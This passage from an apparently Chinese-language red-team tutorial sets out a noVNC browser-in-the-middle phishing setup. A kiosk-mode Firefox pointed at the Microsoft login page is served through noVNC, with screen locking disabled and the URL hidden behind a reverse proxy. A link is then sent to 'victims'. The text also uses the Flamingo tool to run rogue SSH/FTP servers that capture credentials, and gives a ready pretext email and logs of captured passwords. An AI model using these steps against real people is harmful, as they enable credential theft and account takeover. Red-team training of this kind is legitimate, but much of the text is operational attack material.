```
完整的 vnc.html:
```html
Sign in to Microsoft Azure
noVNC encountered an error:
noVNC
```
在用户目录的 .vnc 目录下创建 xstartup 文件并赋予执行权限:
```bash
#!/bin/sh
# Start Gnome 3 Desktop
[ -x /etc/vnc/xstartup ] && exec /etc/vnc/xstartup
[ -r $HOME/.Xresources ] && xrdb $HOME/.Xresources
vncconfig -iconic &
dbus-launch --exit-with-session gnome-session &
```
启动 vnc 服务器以及 noVNC:
```shell
tigervncserver -xstartup /usr/bin/gnome-session
noVNC/utils/novnc_proxy --vnc 0.0.0.0:5901 --listen 80
# 第二个实例
tigervncserver -xstartup /usr/bin/gnome-session
noVNC/utils/novnc_proxy --vnc 0.0.0.0:5902 --listen 81
# 第三个实例
tigervncserver -xstartup /usr/bin/gnome-session
noVNC/utils/novnc_proxy --vnc 0.0.0.0:5903 --listen 82
```
配置 Firefox 浏览器并开启 kiosk 模式
```shell
wget -O ~/FirefoxSetup.tar.bz2 “https://download.mozilla.org/?product=firefox-latest&os=linux64"
sudo tar xjf ~/FirefoxSetup.tar.bz2 -C /opt/
sudo ln -s /opt/firefox/firefox /usr/bin/firefox
firefox --kiosk https://login.microsoftonline.com
```
在配置完 tigerVNC、Ubuntu 桌面、以及 noVNC 之后,还有这些需要注意
1:勿使用高权限帐号启动 VNC 服务。防止被第三方攻击者执行系统命令从而拿下服务器最高权限。
2:运行 VNC 的服务器请不要存储数据与重要文件。防止第三方的 **kiosk 逃逸攻击**从而执行系统命令
3:取消 Ubuntu 桌面的自动锁屏 (重要),可以通过 GUI 来关闭,也可以通过如下命令
```shell
gsettings set org.gnome.desktop.lockdown disable-lock-screen 'true'
gsettings set org.gnome.desktop.screensaver lock-enabled false
```
4:在**移动端**访问容易看出端倪
5:考虑到原始 URL 较为容易分辨且 noVNC 自带开放目录的设置,通过**反向代理**隐藏真实 URL 以及开放的目录。
将链接 [http://example.com/vnc.html?autoconnect=true&password=pass123&resize=remote](http://example.com/vnc.html?autoconnect=true&password=pass123&resize=remote) 发送给受害者。
## **行为诱导**
#### **Flamingo**
其实行为诱导的目的可以有很多,但在红队行动的语境下,可以是这样的
1:连接到我们的 Rogue 服务器,获得凭证 (类似于通过点击伪造连接指向的登陆页面,但不需要连接)
2:临时关闭杀毒软件
3:临时允许运行/安装第三方应用
Flamingo ([https://github.com/atredispartners/flamingo](https://github.com/atredispartners/flamingo)) 是一款用 Go 编写的可以生成多个 Rogue 服务器的应用,包含了 SSH, HTTP, LDAP, DNS, FTP, 和 SNMP 协议,非常适合于内部钓鱼的情景。
我们可以发送如下语境的邮件 (修改细节使其更加可信)
```
主题:请尽快在Web01上检查源代码
发件人:alice@raven-med.local
收件人:engineers@dev.raven-med.local
抄送:无
研发部门:
你们好,存储在Web01 FTP服务器上的源代码缺少重要代码段。请使用你们的域账户和密码登陆Web01主机的FTP服务器并加以检查和确认。用户名形式为 xx@dev.ravem-med.local。如果有任何其他问题,请随时与我联系。
Alice
```
我们运行 flamingo 并开启多个服务的 Rouge 服务器
[](https://raven-medicine.com/uploads/images/gallery/2023-02/vciq6GhwkSS6ibzy-image.png)
```shell
└─# flamingo
flamingo 0.0.19 is waiting to feed...
{"_etime":"2023-02-27T12:18:32-08:00","level":"info","output":"saving credentials to stdout, flamingo.log"}
{"_etime":"2023-02-27T12:18:32-08:00","level":"error","output":"failed to start ldap server [::]:389: failed to listen on [::]:389 (listen tcp 0.0.0.0:389: bind: address already in use)"}
{"_etime":"2023-02-27T12:18:44-08:00","_host":"[::1]:52260","_proto":"ssh","_server":"[::]:22","_type":"credential","level":"warning","method":"pubkey","output":"credential","pubkey":"ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIGjSAhSdF06lNyZ1D5AMqipfdAKUM+lbhCHRHDFBuWuy","pubkey-sha256":"SHA256:x07F52CBRLvY9CR/W1iguK9MXOrEoiiOEz2LxXqIm5s","username":"root","version":"SSH-2.0-OpenSSH_9.0p1 Debian-1"}
{"_etime":"2023-02-27T12:18:48-08:00","_host":"[::1]:52260","_proto":"ssh","_server":"[::]:22","_type":"credential","level":"warning","method":"password","output":"credential","password":"Passw0rd","username":"root","version":"SSH-2.0-OpenSSH_9.0p1 Debian-1"}
{"_etime":"2023-02-27T12:20:15-08:00","_host":"[::1]:44396","_proto":"ftp","_server":"[::]:21","_type":"credential","level":"warning","output":"credential","password":"passw0rd","username":"root"}
```
模拟受害用户登录我们的 Rogue 服务器,他们的凭证会被捕捉。
[](https://raven-medicine.com/uploads/images/gallery/2023-02/W3JrupvqwDMeWvHH-image.png)
```shell
┌──(root㉿kali)-[~/Desktop]
└─# ssh root@localhost
The authenticity of host 'localhost (::1)' can't be established.
RSA key fingerprint is SHA256:5SK9qyaL0HdtcweF/LN48UGmEIetudzd9wrDhoQUc4c.
This key is not known by any other names
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added 'localhost' (RSA) to the list of known hosts.
root@localhost's password:
Permission denied, please try again.
root@localhost's password:
┌──(root㉿kali)-[~/Desktop]
└─# ftp localhost
Trying [::1]:21 ...
Connected to localhost.
220 Welcome to FTP server.
Name (localhost:root): root
331 Username ok, password required
Password:
230 Password ok, continue
421 Service not available, remote server has closed connection.
ftp: No control connection for command
ftp>
```
Power
Clipboard
Settings